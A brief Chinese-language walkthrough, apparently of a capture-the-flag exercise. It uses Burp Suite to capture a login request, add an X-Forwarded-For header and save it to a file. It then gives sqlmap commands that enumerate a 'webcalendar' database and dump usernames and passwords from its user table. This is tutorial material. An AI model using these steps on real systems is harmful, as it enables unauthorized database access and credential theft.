本文介绍如何利用Burp Suite截取并修改HTTP请求,通过添加代理和使用X-Forwarded-For头来伪装请求源。进一步地,通过将截获的请求发送到Repeater模块进行编辑,然后保存为TXT文件。最后,使用SQLMap工具自动化地从TXT文件中读取请求,针对特定数据库执行SQL注入攻击,包括列出数据库、表、列以及导出敏感数据。
浏览器设置代理,burp截断登陆请求的数据包
send to repeater,然后增加一行X-Forwarded-For:*,下一行留空
Go 保存response,改成txt文件
打开sqlmap,依次查出数据库、查询表名、查询列中的字段,如sqlmap -r txt文件路径 --dbs --batch(–batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。)
sqlmap -r /opt/abc.txt -D webcalendar --tables --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user --columns --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user -C username,password --dump --batch
获得用户名密码,输入得到key 
扫一扫
1017
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
